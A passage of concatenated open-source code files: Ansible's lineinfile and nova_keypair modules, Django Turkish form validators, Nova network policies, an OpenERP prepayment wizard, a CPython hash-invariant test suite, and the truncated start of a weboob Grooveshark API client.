                if len(b_lines) == index[1]:
                    if b_lines[index[1] - 1].rstrip(b('\r\n')) != b_line:
                        b_lines.append(b_line + b_linesep)
                        msg = 'line added'
                        changed = True
                elif b_lines[index[1]].rstrip(b('\r\n')) != b_line:
                    b_lines.insert(index[1], b_line + b_linesep)
                    msg = 'line added'
                    changed = True
            elif insertbefore:
                # If the line to insert before is at the beginning of the file
                # use the appropriate index value.
                if index[1] == 0:
                    if b_lines[index[1]].rstrip(b('\r\n')) != b_line:
                        b_lines.insert(index[1], b_line + b_linesep)
                        msg = 'line replaced'
                        changed = True
                elif b_lines[index[1] - 1].rstrip(b('\r\n')) != b_line:
                    b_lines.insert(index[1], b_line + b_linesep)
                    msg = 'line replaced'
                    changed = True
        elif b_lines[index[0]] != b_new_line:
            b_lines[index[0]] = b_new_line
            msg = 'line replaced'
            changed = True
    elif backrefs:
        # Do absolutely nothing, since it's not safe generating the line
        # without the regexp matching to populate the backrefs.
        pass
    # Add it to the beginning of the file
    elif insertbefore == 'BOF' or insertafter == 'BOF':
        b_lines.insert(0, b_line + b_linesep)
        msg = 'line added'
        changed = True
    # Add it to the end of the file if requested or
    # if insertafter/insertbefore didn't match anything
    # (so default behaviour is to add at the end)
    elif insertafter == 'EOF' or index[1] == -1:
        # If the file is not empty then ensure there's a newline before the added line
        if b_lines and not b_lines[-1][-1:] in (b('\n'), b('\r')):
            b_lines.append(b_linesep)
        b_lines.append(b_line + b_linesep)
        msg = 'line added'
        changed = True
    # insert matched, but not the regexp
    else:
        b_lines.insert(index[1], b_line + b_linesep)
        msg = 'line added'
        changed = True
    if module._diff:
        diff['after'] = to_native(b('').join(b_lines))
    backupdest = ""
    if changed and not module.check_mode:
        if backup and os.path.exists(b_dest):
            backupdest = module.backup_local(dest)
        write_changes(module, b_lines, dest)
    if module.check_mode and not os.path.exists(b_dest):
        # File would have been created: attribute checks below would fail.
        module.exit_json(changed=changed, msg=msg, backup=backupdest, diff=diff)
    attr_diff = {}
    msg, changed = check_file_attrs(module, changed, msg, attr_diff)
    attr_diff['before_header'] = '%s (file attributes)' % dest
    attr_diff['after_header'] = '%s (file attributes)' % dest
    difflist = [diff, attr_diff]
    module.exit_json(changed=changed, msg=msg, backup=backupdest, diff=difflist)
def absent(module, dest, regexp, line, backup):
    """Remove every line of *dest* matching *regexp* (or equal to *line* when
    no regexp is given), then exit the module with the result."""
    b_dest = to_bytes(dest, errors='surrogate_or_strict')
    if not os.path.exists(b_dest):
        module.exit_json(changed=False, msg="file not present")
    msg = ''
    diff = {'before': '',
            'after': '',
            'before_header': '%s (content)' % dest,
            'after_header': '%s (content)' % dest}
    fh = open(b_dest, 'rb')
    b_lines = fh.readlines()
    fh.close()
    if module._diff:
        diff['before'] = to_native(b('').join(b_lines))
    b_regexp = re.compile(to_bytes(regexp, errors='surrogate_or_strict')) if regexp is not None else None
    b_line = to_bytes(line, errors='surrogate_or_strict')
    # Partition the file into lines to drop ('found') and lines to keep.
    found = []
    kept = []
    for b_cur_line in b_lines:
        if b_regexp is not None:
            hit = b_regexp.search(b_cur_line)
        else:
            # No regexp: compare against the literal line, ignoring EOL chars.
            hit = b_line == b_cur_line.rstrip(b('\r\n'))
        if hit:
            found.append(b_cur_line)
        else:
            kept.append(b_cur_line)
    b_lines = kept
    changed = len(found) > 0
    if module._diff:
        diff['after'] = to_native(b('').join(b_lines))
    backupdest = ""
    if changed and not module.check_mode:
        if backup:
            backupdest = module.backup_local(dest)
        write_changes(module, b_lines, dest)
    if changed:
        msg = "%s line(s) removed" % len(found)
    attr_diff = {}
    msg, changed = check_file_attrs(module, changed, msg, attr_diff)
    attr_diff['before_header'] = '%s (file attributes)' % dest
    attr_diff['after_header'] = '%s (file attributes)' % dest
    difflist = [diff, attr_diff]
    module.exit_json(changed=changed, found=len(found), msg=msg, backup=backupdest, diff=difflist)
def main():
    """Entry point: parse module parameters and dispatch to present()/absent()."""
    module = AnsibleModule(
        argument_spec=dict(
            path=dict(type='path', required=True, aliases=['dest', 'destfile', 'name']),
            state=dict(type='str', default='present', choices=['absent', 'present']),
            regexp=dict(type='str'),
            line=dict(type='str', aliases=['value']),
            insertafter=dict(type='str'),
            insertbefore=dict(type='str'),
            backrefs=dict(type='bool', default=False),
            create=dict(type='bool', default=False),
            backup=dict(type='bool', default=False),
            firstmatch=dict(default=False, type='bool'),
            validate=dict(type='str'),
        ),
        mutually_exclusive=[['insertbefore', 'insertafter']],
        add_file_common_args=True,
        supports_check_mode=True,
    )
    params = module.params
    path = params['path']
    b_path = to_bytes(path, errors='surrogate_or_strict')
    if os.path.isdir(b_path):
        module.fail_json(rc=256, msg='Path %s is a directory !' % path)
    if params['state'] == 'present':
        if params['backrefs'] and params['regexp'] is None:
            module.fail_json(msg='regexp= is required with backrefs=true')
        if params.get('line', None) is None:
            module.fail_json(msg='line= is required with state=present')
        # insertafter defaults to EOF; applied here rather than in the
        # argument spec so the mutually_exclusive check does not trip on
        # the default value.
        ins_bef, ins_aft = params['insertbefore'], params['insertafter']
        if ins_bef is None and ins_aft is None:
            ins_aft = 'EOF'
        present(module, path, params['regexp'], params['line'],
                ins_aft, ins_bef, params['create'], params['backup'],
                params['backrefs'], params['firstmatch'])
    else:
        if params['regexp'] is None and params.get('line', None) is None:
            module.fail_json(msg='one of line= or regexp= is required with state=absent')
        absent(module, path, params['regexp'], params.get('line', None), params['backup'])
if __name__ == '__main__':
main()
| gpl-3.0 |
klnprj/testapp | django/contrib/localflavor/tr/forms.py | 87 | 3518 | """
TR-specific Form helpers
"""
from __future__ import absolute_import
import re
from django.contrib.localflavor.tr.tr_provinces import PROVINCE_CHOICES
from django.core.validators import EMPTY_VALUES
from django.forms import ValidationError
from django.forms.fields import Field, RegexField, Select, CharField
from django.utils.encoding import smart_unicode
from django.utils.translation import ugettext_lazy as _
phone_digits_re = re.compile(r'^(\+90|0)? ?(([1-9]\d{2})|\([1-9]\d{2}\)) ?([2-9]\d{2} ?\d{2} ?\d{2})$')
class TRPostalCodeField(RegexField):
    """Validates Turkish postal codes: five digits whose first two digits must
    name an existing province (01 through 81)."""
    default_error_messages = {
        'invalid': _(u'Enter a postal code in the format XXXXX.'),
    }

    def __init__(self, max_length=5, min_length=5, *args, **kwargs):
        super(TRPostalCodeField, self).__init__(r'^\d{5}$',
                max_length, min_length, *args, **kwargs)

    def clean(self, value):
        value = super(TRPostalCodeField, self).clean(value)
        if value in EMPTY_VALUES:
            return u''
        if len(value) != 5:
            raise ValidationError(self.error_messages['invalid'])
        # Leading two digits encode the province; valid codes are 01..81.
        province = int(value[:2])
        if not 1 <= province <= 81:
            raise ValidationError(self.error_messages['invalid'])
        return value
class TRPhoneNumberField(CharField):
    """Normalizes Turkish phone numbers to a ten-digit area+number string."""
    default_error_messages = {
        'invalid': _(u'Phone numbers must be in 0XXX XXX XXXX format.'),
    }

    def clean(self, value):
        super(TRPhoneNumberField, self).clean(value)
        if value in EMPTY_VALUES:
            return u''
        # Strip parentheses and whitespace before matching.
        normalized = re.sub('(\(|\)|\s+)', '', smart_unicode(value))
        match = phone_digits_re.search(normalized)
        if not match:
            raise ValidationError(self.error_messages['invalid'])
        # Group 2 is the area code, group 4 the subscriber number.
        return u'%s%s' % (match.group(2), match.group(4))
class TRIdentificationNumberField(Field):
    """
    A Turkey Identification Number number.

    See: http://tr.wikipedia.org/wiki/T%C3%BCrkiye_Cumhuriyeti_Kimlik_Numaras%C4%B1

    Checks the following rules to determine whether the number is valid:

        * The number is 11-digits.
        * First digit is not 0.
        * Conforms to the following two formula:
          (sum(1st, 3rd, 5th, 7th, 9th)*7 - sum(2nd,4th,6th,8th)) % 10 = 10th digit
          sum(1st to 10th) % 10 = 11th digit
    """
    default_error_messages = {
        'invalid': _(u'Enter a valid Turkish Identification number.'),
        'not_11': _(u'Turkish Identification number must be 11 digits.'),
    }

    def clean(self, value):
        super(TRIdentificationNumberField, self).clean(value)
        if value in EMPTY_VALUES:
            return u''
        if len(value) != 11:
            raise ValidationError(self.error_messages['not_11'])
        if not re.match(r'^\d{11}$', value):
            raise ValidationError(self.error_messages['invalid'])
        digits = [int(ch) for ch in value]
        if digits[0] == 0:
            raise ValidationError(self.error_messages['invalid'])
        # 10th digit: weighted difference of odd-/even-position digits mod 10.
        tenth = (sum(digits[0:9:2]) * 7 - sum(digits[1:9:2])) % 10
        # 11th digit: sum of the first ten digits mod 10.
        eleventh = sum(digits[:10]) % 10
        if tenth != digits[9] or eleventh != digits[10]:
            raise ValidationError(self.error_messages['invalid'])
        return value
class TRProvinceSelect(Select):
    """
    A Select widget that uses a list of provinces in Turkey as its choices.
    """
    def __init__(self, attrs=None):
        # Choices come from the static PROVINCE_CHOICES table in
        # django.contrib.localflavor.tr.tr_provinces.
        super(TRProvinceSelect, self).__init__(attrs, choices=PROVINCE_CHOICES)
| bsd-3-clause |
rickmendes/ansible-modules-core | cloud/openstack/_nova_keypair.py | 41 | 5486 | #!/usr/bin/python
#coding: utf-8 -*-
# (c) 2013, Benno Joy <benno@ansible.com>
# (c) 2013, John Dewey <john@dewey.ws>
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
import time
try:
from novaclient.v1_1 import client as nova_client
from novaclient import exceptions as exc
HAS_NOVACLIENT = True
except ImportError:
HAS_NOVACLIENT = False
DOCUMENTATION = '''
---
module: nova_keypair
version_added: "1.2"
author:
- "Benno Joy (@bennojoy)"
- "Michael DeHaan"
deprecated: Deprecated in 2.0. Use os_keypair instead
short_description: Add/Delete key pair from nova
description:
- Add or Remove key pair from nova .
options:
login_username:
description:
- login username to authenticate to keystone
required: true
default: admin
login_password:
description:
- Password of login user
required: true
default: 'yes'
login_tenant_name:
description:
- The tenant name of the login user
required: true
default: 'yes'
auth_url:
description:
- The keystone url for authentication
required: false
default: 'http://127.0.0.1:35357/v2.0/'
region_name:
description:
- Name of the region
required: false
default: None
state:
description:
- Indicate desired state of the resource
choices: ['present', 'absent']
default: present
name:
description:
- Name that has to be given to the key pair
required: true
default: None
public_key:
description:
- The public key that would be uploaded to nova and injected to vm's upon creation
required: false
default: None
requirements:
- "python >= 2.6"
- "python-novaclient"
'''
EXAMPLES = '''
# Creates a key pair with the running users public key
- nova_keypair: state=present login_username=admin
login_password=admin login_tenant_name=admin name=ansible_key
public_key={{ lookup('file','~/.ssh/id_rsa.pub') }}
# Creates a new key pair and the private key returned after the run.
- nova_keypair: state=present login_username=admin login_password=admin
login_tenant_name=admin name=ansible_key
'''
def main():
    """Create or delete a nova keypair according to the 'state' parameter."""
    argument_spec = openstack_argument_spec()
    argument_spec.update(dict(
        name = dict(required=True),
        public_key = dict(default=None),
        state = dict(default='present', choices=['absent', 'present'])
    ))
    module = AnsibleModule(argument_spec=argument_spec)
    if not HAS_NOVACLIENT:
        module.fail_json(msg='python-novaclient is required for this module to work')
    nova = nova_client.Client(module.params['login_username'],
                              module.params['login_password'],
                              module.params['login_tenant_name'],
                              module.params['auth_url'],
                              region_name=module.params['region_name'],
                              service_type='compute')
    try:
        nova.authenticate()
    except exc.Unauthorized as e:
        module.fail_json(msg = "Invalid OpenStack Nova credentials.: %s" % e.message)
    except exc.AuthorizationFailure as e:
        module.fail_json(msg = "Unable to authorize user: %s" % e.message)
    if module.params['state'] == 'present':
        for key in nova.keypairs.list():
            if key.name == module.params['name']:
                if module.params['public_key'] and (module.params['public_key'] != key.public_key ):
                    # BUG FIX: 'key' is a novaclient object, not a dict;
                    # key['name'] raised TypeError on this error path.
                    module.fail_json(msg = "name {} present but key hash not the same as offered. Delete key first.".format(key.name))
                else:
                    module.exit_json(changed = False, result = "Key present")
        try:
            key = nova.keypairs.create(module.params['name'], module.params['public_key'])
        except Exception as e:
            # BUG FIX: a failed create must be reported as a failure
            # (fail_json), not a successful exit, consistent with every
            # other error path above.
            module.fail_json(msg = "Error in creating the keypair: %s" % e.message)
        if not module.params['public_key']:
            # No key supplied: nova generated one; return its private half.
            module.exit_json(changed = True, key = key.private_key)
        module.exit_json(changed = True, key = None)
    if module.params['state'] == 'absent':
        for key in nova.keypairs.list():
            if key.name == module.params['name']:
                try:
                    nova.keypairs.delete(module.params['name'])
                except Exception as e:
                    module.fail_json(msg = "The keypair deletion has failed: %s" % e.message)
                module.exit_json( changed = True, result = "deleted")
    module.exit_json(changed = False, result = "not present")
# this is magic, see lib/ansible/module.params['common.py
from ansible.module_utils.basic import *
from ansible.module_utils.openstack import *
if __name__ == '__main__':
main()
| gpl-3.0 |
mahak/nova | nova/policies/networks.py | 2 | 2189 | # Copyright 2016 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_policy import policy
from nova.policies import base
# Format string for per-action policy names, and the legacy single 'view'
# policy name these actions replace.
POLICY_ROOT = 'os_compute_api:os-networks:%s'
BASE_POLICY_NAME = 'os_compute_api:os-networks:view'
DEPRECATED_REASON = """
Nova API policies are introducing new default roles with scope_type
capabilities. Old policies are deprecated and silently going to be ignored
in nova 23.0.0 release.
"""
# The old 'view' rule, registered as the deprecated alias of the rules below
# so operator overrides of the old name keep working during the deprecation
# window.
DEPRECATED_POLICY = policy.DeprecatedRule(
    BASE_POLICY_NAME,
    base.RULE_ADMIN_OR_OWNER,
    deprecated_reason=DEPRECATED_REASON,
    deprecated_since='22.0.0'
)
networks_policies = [
    policy.DocumentedRuleDefault(
        name=POLICY_ROOT % 'list',
        check_str=base.PROJECT_READER_OR_SYSTEM_READER,
        description="""List networks for the project.
This API is proxy calls to the Network service. This is deprecated.""",
        operations=[
            {
                'method': 'GET',
                'path': '/os-networks'
            }
        ],
        scope_types=['system', 'project'],
        deprecated_rule=DEPRECATED_POLICY),
    policy.DocumentedRuleDefault(
        name=POLICY_ROOT % 'show',
        check_str=base.PROJECT_READER_OR_SYSTEM_READER,
        description="""Show network details.
This API is proxy calls to the Network service. This is deprecated.""",
        operations=[
            {
                'method': 'GET',
                'path': '/os-networks/{network_id}'
            }
        ],
        scope_types=['system', 'project'],
        deprecated_rule=DEPRECATED_POLICY),
]
def list_rules():
    """Return the os-networks policy rules for registration with oslo.policy."""
    return networks_policies
| apache-2.0 |
Elico-Corp/openerp-7.0 | sale_prepayment/wizard/prepay_wizard.py | 1 | 3615 | # -*- coding: utf-8 -*-
# © 2016 Elico Corp (https://www.elico-corp.com)
# Licence AGPL-3.0 or Later(http://www.gnu.org/licenses/agpl.html)
from openerp.osv import orm, fields, osv
import openerp.addons.decimal_precision as dp
import time
class sale_prepayment(orm.TransientModel):
    """Wizard to register a (pre)payment against the active sale order."""
    _name = 'sale.prepayment'
    _columns = {
        'journal_id': fields.many2one(
            'account.journal',
            'Journal',
            required=True),
        'amount': fields.float(
            'Amount',
            digits_compute=dp.get_precision('Account'),
            required=True),
        'is_prepayment': fields.boolean(
            'Prepayment',
            help='Check this box if you want the payment method to create a'
            "prepayment payment using the prepayment account instead of direct"
            'accounting moves linked to receivable account')
    }
    def _get_default_amount(self, cr, uid, context=None):
        # Default the wizard amount to the residual of the sale order the
        # wizard was launched from (context['active_id']).
        sale_id = False
        sale_obj = self.pool.get('sale.order')
        if context:
            sale_id = context.get('active_id', False)
        if sale_id:
            sale_record = sale_obj.browse(cr, uid, sale_id, context)
            return sale_record and sale_record.residual or 0.0
        return 0.0
    def _get_default_journal(self, cr, uid, context=None):
        # Default journal comes from the sale order's payment method.
        sale_id = False
        sale_obj = self.pool.get('sale.order')
        if context:
            sale_id = context.get('active_id', False)
        if sale_id:
            sale_record = sale_obj.browse(cr, uid, sale_id, context)
            payment_method = sale_record and sale_record.payment_method_id
            return payment_method and payment_method.journal_id.id or False
        return False
    def _get_default_is_prepayment(self, cr, uid, context=None):
        # Default the prepayment flag from the sale order's payment method.
        sale_id = False
        sale_obj = self.pool.get('sale.order')
        if context:
            sale_id = context.get('active_id', False)
        if sale_id:
            sale_record = sale_obj.browse(cr, uid, sale_id, context)
            payment_method = sale_record and sale_record.payment_method_id
            return payment_method and payment_method.is_prepayment or False
        return False
    _defaults = {
        'amount': _get_default_amount,
        'journal_id': _get_default_journal,
        'is_prepayment': _get_default_is_prepayment
    }
    def act_prepayment(self, cr, uid, ids, context=None):
        '''do the prepayment '''
        sale_obj = self.pool.get('sale.order')
        sale_id = context and context.get('active_id', False)
        sale = sale_obj.browse(cr, uid, sale_id, context=context)
        date = time.strftime('%Y-%m-%d')
        for prepay in self.browse(cr, uid, ids, context=context):
            journal = prepay.journal_id
            amount = prepay.amount
            is_prepayment = prepay.is_prepayment
            if is_prepayment is True:
                # Prepayments require a prepayment account on the partner.
                if not sale.partner_id.property_account_prepayable:
                    raise osv.except_osv(
                        'Warning',
                        "Please set this partner's payable account!")
            if amount <= 0:
                raise osv.except_osv('Warning', 'The amount must be positive!')
            if sale.payment_method_id:
                # NOTE(review): assigning attributes on a browse record may
                # not persist through the OpenERP 7 ORM — confirm this write
                # actually reaches the database.
                sale.payment_method_id.is_prepayment = is_prepayment
                sale.payment_method_id.journal_id = journal
            sale_obj._add_payment(
                cr, uid, sale, journal,
                amount, date, sale and sale.name or '', context=context)
            #write back the field is_prepayment
            sale_obj.write(cr, uid, sale_id, {'has_prepaid': True})
| agpl-3.0 |
mancoast/CPythonPyc_test | fail/324_test_hash.py | 7 | 7046 | # test the invariant that
# iff a==b then hash(a)==hash(b)
#
# Also test that hash implementations are inherited as expected
import datetime
import os
import sys
import unittest
from test import support
from test.script_helper import assert_python_ok
from collections import Hashable
IS_64BIT = sys.maxsize > 2**32
class HashEqualityTestCase(unittest.TestCase):
    """Check the invariant that a == b implies hash(a) == hash(b)."""

    def same_hash(self, *objlist):
        """Fail unless every object in *objlist* hashes to the same value."""
        hashes = [hash(obj) for obj in objlist]
        if any(h != hashes[0] for h in hashes[1:]):
            self.fail("hashed values differ: %r" % (objlist,))

    def test_numeric_literals(self):
        self.same_hash(1, 1, 1.0, 1.0+0.0j)
        self.same_hash(0, 0.0, 0.0+0.0j)
        self.same_hash(-1, -1.0, -1.0+0.0j)
        self.same_hash(-2, -2.0, -2.0+0.0j)

    def test_coerced_integers(self):
        self.same_hash(int(1), int(1), float(1), complex(1),
                       int('1'), float('1.0'))
        self.same_hash(int(-2**31), float(-2**31))
        self.same_hash(int(1-2**31), float(1-2**31))
        self.same_hash(int(2**31-1), float(2**31-1))
        # for 64-bit platforms
        self.same_hash(int(2**31), float(2**31))
        self.same_hash(int(-2**63), float(-2**63))
        self.same_hash(int(2**63), float(2**63))

    def test_coerced_floats(self):
        self.same_hash(int(1.23e300), float(1.23e300))
        self.same_hash(float(0.5), complex(0.5, 0.0))
# Baseline: the default identity-based hash implementation.
_default_hash = object.__hash__
class DefaultHash(object): pass
_FIXED_HASH_VALUE = 42
class FixedHash(object):
    # Hashable with a constant hash (legal: equal objects merely collide).
    def __hash__(self):
        return _FIXED_HASH_VALUE
class OnlyEquality(object):
    # Defining __eq__ without __hash__ sets __hash__ to None in Python 3,
    # making instances unhashable.
    def __eq__(self, other):
        return self is other
class OnlyInequality(object):
    # Defining only __ne__ does NOT disable hashing; the default hash stays.
    def __ne__(self, other):
        return self is not other
# Multiple inheritance: FixedHash's explicit __hash__ wins in the MRO even
# when a sibling base defines __eq__/__ne__.
class InheritedHashWithEquality(FixedHash, OnlyEquality): pass
class InheritedHashWithInequality(FixedHash, OnlyInequality): pass
class NoHash(object):
    # Explicitly unhashable: hash(NoHash()) raises TypeError.
    __hash__ = None
class HashInheritanceTestCase(unittest.TestCase):
    """Check that __hash__ is inherited (or disabled) exactly as documented."""
    # Expected to fall back to object.__hash__ (identity hash).
    default_expected = [object(),
                        DefaultHash(),
                        OnlyInequality(),
                       ]
    # Expected to inherit FixedHash.__hash__ through the MRO.
    fixed_expected = [FixedHash(),
                      InheritedHashWithEquality(),
                      InheritedHashWithInequality(),
                      ]
    # Expected to be unhashable: hash() must raise TypeError.
    error_expected = [NoHash(),
                      OnlyEquality(),
                      ]
    def test_default_hash(self):
        for obj in self.default_expected:
            self.assertEqual(hash(obj), _default_hash(obj))
    def test_fixed_hash(self):
        for obj in self.fixed_expected:
            self.assertEqual(hash(obj), _FIXED_HASH_VALUE)
    def test_error_hash(self):
        for obj in self.error_expected:
            self.assertRaises(TypeError, hash, obj)
    def test_hashable(self):
        # Hashable ABC membership must agree with actual hashability.
        objects = (self.default_expected +
                   self.fixed_expected)
        for obj in objects:
            self.assertIsInstance(obj, Hashable)
    def test_not_hashable(self):
        for obj in self.error_expected:
            self.assertNotIsInstance(obj, Hashable)
# Issue #4701: Check that some builtin types are correctly hashable
class DefaultIterSeq(object):
    """Sequence iterable only through the legacy __len__/__getitem__ protocol
    (no __iter__), so iter() returns a default sequence iterator."""
    seq = range(10)

    def __len__(self):
        return len(self.seq)

    def __getitem__(self, index):
        # Delegate straight to the underlying range object.
        return self.seq[index]
class HashBuiltinsTestCase(unittest.TestCase):
    """Regression check for issue #4701: these builtin iterator/sequence
    objects must use the default identity hash."""
    hashes_to_check = [range(10),
                       enumerate(range(10)),
                       iter(DefaultIterSeq()),
                       iter(lambda: 0, 0),
                      ]
    def test_hashes(self):
        _default_hash = object.__hash__
        for obj in self.hashes_to_check:
            self.assertEqual(hash(obj), _default_hash(obj))
class HashRandomizationTests(unittest.TestCase):
    """Base class: compute hashes in a child interpreter so PYTHONHASHSEED
    can be controlled per run."""
    # Each subclass should define a field "repr_", containing the repr() of
    # an object to be tested
    def get_hash_command(self, repr_):
        # Code executed via "python -c" in the child interpreter.
        return 'print(hash(%s))' % repr_
    def get_hash(self, repr_, seed=None):
        """Hash repr_ in a subprocess; seed sets PYTHONHASHSEED (None=unset)."""
        env = os.environ.copy()
        env['__cleanenv'] = True  # signal to assert_python not to do a copy
                                  # of os.environ on its own
        if seed is not None:
            env['PYTHONHASHSEED'] = str(seed)
        else:
            env.pop('PYTHONHASHSEED', None)
        out = assert_python_ok(
            '-c', self.get_hash_command(repr_),
            **env)
        # out is (rc, stdout, stderr); the hash is printed on stdout.
        stdout = out[1].strip()
        return int(stdout)
    def test_randomized_hash(self):
        # two runs should return different hashes
        run1 = self.get_hash(self.repr_, seed='random')
        run2 = self.get_hash(self.repr_, seed='random')
        self.assertNotEqual(run1, run2)
class StringlikeHashRandomizationTests(HashRandomizationTests):
    """Shared checks for str/bytes subclasses; the constants below are the
    precomputed hashes for the subclasses' repr_ value per word size."""
    def test_null_hash(self):
        # PYTHONHASHSEED=0 disables the randomized hash
        if IS_64BIT:
            known_hash_of_obj = 1453079729188098211
        else:
            known_hash_of_obj = -1600925533
        # Randomization is disabled by default:
        self.assertEqual(self.get_hash(self.repr_), known_hash_of_obj)
        # It can also be disabled by setting the seed to 0:
        self.assertEqual(self.get_hash(self.repr_, seed=0), known_hash_of_obj)
    def test_fixed_hash(self):
        # test a fixed seed for the randomized hash
        # Note that all types share the same values:
        if IS_64BIT:
            if sys.byteorder == 'little':
                h = -4410911502303878509
            else:
                h = -3570150969479994130
        else:
            if sys.byteorder == 'little':
                h = -206076799
            else:
                h = -1024014457
        self.assertEqual(self.get_hash(self.repr_, seed=42), h)
class StrHashRandomizationTests(StringlikeHashRandomizationTests):
    repr_ = repr('abc')
    def test_empty_string(self):
        # The empty string hashes to 0 regardless of the seed.
        self.assertEqual(hash(""), 0)
class BytesHashRandomizationTests(StringlikeHashRandomizationTests):
    repr_ = repr(b'abc')
    def test_empty_string(self):
        self.assertEqual(hash(b""), 0)
class DatetimeTests(HashRandomizationTests):
    def get_hash_command(self, repr_):
        # datetime reprs need the module imported in the child interpreter.
        return 'import datetime; print(hash(%s))' % repr_
class DatetimeDateTests(DatetimeTests):
    repr_ = repr(datetime.date(1066, 10, 14))
class DatetimeDatetimeTests(DatetimeTests):
    repr_ = repr(datetime.datetime(1, 2, 3, 4, 5, 6, 7))
class DatetimeTimeTests(DatetimeTests):
    repr_ = repr(datetime.time(0))
def test_main():
    """Entry point used by the regrtest framework: run all test cases."""
    support.run_unittest(HashEqualityTestCase,
                         HashInheritanceTestCase,
                         HashBuiltinsTestCase,
                         StrHashRandomizationTests,
                         BytesHashRandomizationTests,
                         DatetimeDateTests,
                         DatetimeDatetimeTests,
                         DatetimeTimeTests)
if __name__ == "__main__":
    test_main()
| gpl-3.0 |
blckshrk/Weboob | modules/grooveshark/browser.py | 1 | 10898 | # -*- coding: utf-8 -*-
# Copyright(C) 2013 Bezleputh
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
from weboob.tools.browser import BaseBrowser, BrowserIncorrectPassword
from weboob.tools.json import json as simplejson
from weboob.capabilities.video import BaseVideo
from weboob.capabilities import NotAvailable
from weboob.tools.capabilities.thumbnail import Thumbnail
from weboob.capabilities.collection import Collection
import hashlib
import copy
import uuid
import string
import random
import datetime
__all__ = ['GroovesharkBrowser']
class GroovesharkVideo(BaseVideo):
    """A Grooveshark song exposed through weboob's video capability."""
    def __init__(self, *args, **kwargs):
        BaseVideo.__init__(self, *args, **kwargs)
        # Streams are always served as MP3 audio.
        self.ext = u'mp3'
class APIError(Exception):
    """Raised when the Grooveshark JSON API returns a fault or no result."""
    pass
class GroovesharkBrowser(BaseBrowser):
    """Browser speaking Grooveshark's private JSON API (html5 endpoint)."""
    PROTOCOL = 'http'
    DOMAIN = 'html5.grooveshark.com'
    API_URL = 'https://html5.grooveshark.com/more.php'

    #Setting the static header (country, session and uuid)
    HEADER = {}
    HEADER['country'] = {}
    HEADER['country']['CC1'] = 0
    HEADER['country']['CC2'] = 0
    HEADER['country']['CC3'] = 0
    HEADER['country']['CC4'] = 0
    HEADER['country']['ID'] = 1
    HEADER['country']['IPR'] = 1
    HEADER['privacy'] = 0
    # 32 random lowercase hex characters faking a client session id.
    HEADER['session'] = (''.join(random.choice(string.digits + string.letters[:6]) for x in range(32))).lower()
    HEADER["uuid"] = str.upper(str(uuid.uuid4()))

    #those values depends on a grooveshark version and may change
    GROOVESHARK_CONSTANTS = ('mobileshark', '20120830', 'gooeyFlubber')
    COMMUNICATION_TOKEN = None
    VIDEOS_FROM_SONG_RESULTS = None

    def home(self):
        """Entry point: authenticate (if credentials) and fetch the API token."""
        self.login()
        self.get_communication_token()

    def is_logged(self):
        """Return True when a successful authentication produced a user id."""
        # user_id only exists after login() succeeded; use getattr so this is
        # safe to call beforehand.
        user_id = getattr(self, 'user_id', None)
        return user_id is not None and user_id != 0

    def login(self):
        """Authenticate with the stored credentials, if any.

        Raises BrowserIncorrectPassword when the API rejects them.
        """
        if self.username and self.password:
            method = 'authenticateUser'
            parameters = {}
            parameters['username'] = self.username
            parameters['password'] = self.password
            response = self.API_post(method, parameters, self.create_token(method))
            self.user_id = response['result']['userID']
            # Bug fix: is_logged is a method; the original tested the bound
            # method object ("not self.is_logged"), which is always False, so
            # bad credentials were silently accepted.
            if not self.is_logged():
                raise BrowserIncorrectPassword()

    def get_all_user_playlists(self, split_path):
        """Return the logged-in user's playlists as Collection objects."""
        if self.is_logged():
            method = 'userGetPlaylists'
            parameters = {}
            parameters['userID'] = self.user_id
            response = self.API_post(method, parameters, self.create_token(method))
            return self.create_collection_from_playlists_result(response['result']['Playlists'], split_path)

    def search_videos(self, pattern):
        """Search songs matching pattern; yields GroovesharkVideo objects."""
        method = 'getResultsFromSearch'
        parameters = {}
        parameters['query'] = pattern.encode(self.ENCODING)
        parameters['type'] = ['Songs']
        parameters['guts'] = 0
        parameters['ppOverr'] = ''
        response = self.API_post(method, parameters, self.create_token(method))
        songs = self.create_video_from_songs_result(response['result']['result']['Songs'])
        return songs

    def search_albums(self, split_path):
        """Search albums matching split_path[1]; returns Collection objects."""
        pattern = split_path[1]
        method = 'getResultsFromSearch'
        parameters = {}
        parameters['query'] = pattern.encode(self.ENCODING)
        parameters['type'] = ['Albums']
        parameters['guts'] = 0
        parameters['ppOverr'] = ''
        response = self.API_post(method, parameters, self.create_token(method))
        return self.create_collection_from_albums_result(response['result']['result']['Albums'], split_path)

    def create_video_from_songs_result(self, songs):
        """Generator turning raw song dicts into videos (also cached for later
        lookup by get_video_from_song_id)."""
        self.VIDEOS_FROM_SONG_RESULTS = []
        for song in songs:
            video = GroovesharkVideo(song['SongID'])
            video.title = u'Song - %s' % song['SongName'].encode('ascii', 'replace')
            video.author = u'%s' % song['ArtistName'].encode('ascii', 'replace')
            video.description = u'%s - %s - %s' % (video.author, song['AlbumName'].encode('ascii', 'replace'), song['Year'].encode('ascii', 'replace'))
            video.thumbnail = Thumbnail(u'http://images.gs-cdn.net/static/albums/40_' + song['CoverArtFilename'])
            video.duration = datetime.timedelta(seconds=int(float(song['EstimateDuration'])))
            video.rating = float(song['AvgRating'])
            try:
